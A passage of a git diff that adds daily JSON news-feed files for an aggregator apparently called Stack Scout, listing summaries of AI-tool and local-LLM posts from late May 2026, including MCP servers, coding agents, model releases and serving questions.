"category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-27.json b/data/news-feed-2026-05-27.json new file mode 100644 index 0000000..19b3519 --- /dev/null +++ b/data/news-feed-2026-05-27.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:44.008Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-27", + "article_count": 15, + "archived_story_count": 680, + "articles": [ + { + "title": "MarkdownAI v2.0, its a workflow engine, not a template parser", + "url": "https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-27T21:42:18.000Z", + "summary": "MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl…", + "category": "ai_tools" + }, + { + "title": "I ran 8 open-weight models as agents in a persistent MMO for 10 days. Here's the 93k event dataset and some things that I learned", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-27T14:09:26.000Z", + "summary": "Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every \"player\" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d…", + "category": "ai_models" + }, + { + "title": "Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T09:20:45.000Z", + "summary": "been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = \"atlas\" default_model = \"deepseek-ai/deepseek-v4-flash\" [[ custom_providers ]] name = \"atlas\" base_url = \"https://api.atlascloud.ai/v1\" api_key_env = \"ATLAS_API_KEY\" model = \"deepseek…", + "category": "ai_models" + }, + { + "title": "I built a tool that lets your AI assistant test your entire app in a real browser", + "url": "https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-27T02:55:55.000Z", + "summary": "So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant \"test the login flow\" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing)", + "category": "ai_tools" + }, + { + "title": "Anthropic just confirmed why 90% of non-coding AI agents fail in production", + "url": "https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T20:11:57.000Z", + "summary": "Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *\"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet.\"* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. * Why the Rest of the World is Hard: A sales or marketing agent doesn’t…", + "category": "ai_tools" + }, + { + "title": "[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]", + "url": "https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/", + "source": "Reddit r/MachineLearning", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T17:02:55.000Z", + "summary": "I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/)", + "category": "ai_research" + }, + { + "title": "Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T14:54:45.000Z", + "summary": "I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. (No idea how much system ram I will get, but I guess they are a bit flexible on this). \\- I want to build a inference endpoint that can handle up to 30 users. \\- I want a fairly reasonable big context, say 131,072-262,144. \\- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. \\- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \\- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \\- If running on llama.cpp I would probably use UD-Q6\\_K\\_XL or UD-Q8\\_K\\_XL quant from Unsloth. \\- If running on vllm I have no idea on what quant to use? Some advice here would be great. \\- Is there any good tool to benchmark \"concurrent users\"?", + "category": "ai_models" + }, + { + "title": "litellm vs any-llm (otari)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-27T14:09:07.000Z", + "summary": "I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). Was wondering if others have already done similar and have positive or negative experiences", + "category": "ai_models" + }, + { + "title": "Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets", + "url": "https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-27T10:05:58.000Z", + "summary": "Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. * **Smart Local Delegation**: To keep you c…", + "category": "ai_tools" + }, + { + "title": "Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.78, + "date": "2026-05-27T16:57:57.000Z", + "summary": "Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. \"This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. Why the code is shaped the way it is. Stops the model from \"fixing\" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. We ran a time-travel experiment on Django (542 files): scored every file, then…", + "category": "ai_tools" + }, + { + "title": "Millions of AI agents imperiled by critical vulnerability in open source package", + "url": "https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/", + "source": "Ars Technica AI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.74, + "date": "2026-05-27T05:18:30.012Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-27T23:24:48.000Z", + "summary": "I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \\- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. ;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY)", + "category": "ai_models" + }, + { + "title": "BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]", + "url": "https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-27T21:53:42.000Z", + "summary": "\\[R\\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me…", + "category": "ai_research" + }, + { + "title": "Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)", + "url": "https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-27T19:07:02.000Z", + "summary": "Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l…", + "category": "creative_tools" + }, + { + "title": "Qwen3.6 huge quality gain from Q4 to Q6 for coding agent", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T18:32:18.000Z", + "summary": "So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! Local coding agents are a thing and they work 😎", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-28.json b/data/news-feed-2026-05-28.json new file mode 100644 index 0000000..e434f79 --- /dev/null +++ b/data/news-feed-2026-05-28.json @@ -0,0 +1,271 @@ +{ + "generated": "2026-06-05T00:44:44.425Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-28", + "article_count": 15, + "archived_story_count": 714, + "articles": [ + { + "title": "Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy", + "url": "https://x.com/ClaudeCodeLog/status/2059802880811434228", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T12:12:48.493Z", + "summary": "Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space.", + "category": "ai_tools" + }, + { + "title": "I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T03:36:12.000Z", + "summary": "I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. It can help you: \\- see where your skills and MCPs live \\- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \\- standardize around a canonical definition of each skill/MCP \\- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex)", + "category": "ai_tools" + }, + { + "title": "MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock", + "url": "https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-05-28T08:48:48.000Z", + "summary": "While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\\_desktop\\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how?", + "category": "ai_tools" + }, + { + "title": "Introducing Claude Opus 4.8", + "url": "https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-28T16:52:23.000Z", + "summary": "We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8)", + "category": "ai_tools" + }, + { + "title": "I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T15:23:21.000Z", + "summary": "I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. The agent can't write code without an approved plan, can't skip tests, can't say \"tests pass\" without running static analysis. These are…", + "category": "ai_models" + }, + { + "title": "Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T14:21:49.000Z", + "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", + "category": "ai_research" + }, + { + "title": "Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 3M papers, free, looking for feedback [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T13:05:39.000Z", + "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", + "category": "ai_research" + }, + { + "title": "SDXL image generation now works on iPhone. The bug that blocked it for months was a missing file check", + "url": "https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T13:03:34.000Z", + "summary": "We've been building \\[Off Grid\\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. Turns out: SDXL models ship in two UNet layouts: \\- Monolithic: one big \\`Unet.mlmodelc\\` file \\- Chunked: \\`UnetChunk1.mlmodelc\\` + \\`UnetChunk2.mlmodelc\\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said \"model invalid\" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. It's free and open source: \\- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \\- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \\- Android (SD…", + "category": "creative_tools" + }, + { + "title": "DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework", + "url": "https://x.com/isaacbmiller1/status/2059828079371894786", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T12:12:48.493Z", + "summary": "Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production.", + "category": "ai_tools" + }, + { + "title": "Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets", + "url": "https://x.com/TencentAI_News/status/2059827192964808922", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T12:12:47.642Z", + "summary": "Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf.", + "category": "ai_tools" + }, + { + "title": "Local run for multi users: which software set?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-28T11:06:34.000Z", + "summary": "Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? Thank for any help!", + "category": "ai_models" + }, + { + "title": "OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.", + "url": "https://www.digg.com/ai/28n5w7d2", + "source": "Digg AI", + "tags": [ + "mcp", + "product_launch" + ], + "matching_tags": [ + "mcp", + "product_launch" + ], + "importance": 1, + "date": "2026-05-28T05:18:10.307Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering", + "url": "https://www.digg.com/ai/tuo1sird", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + 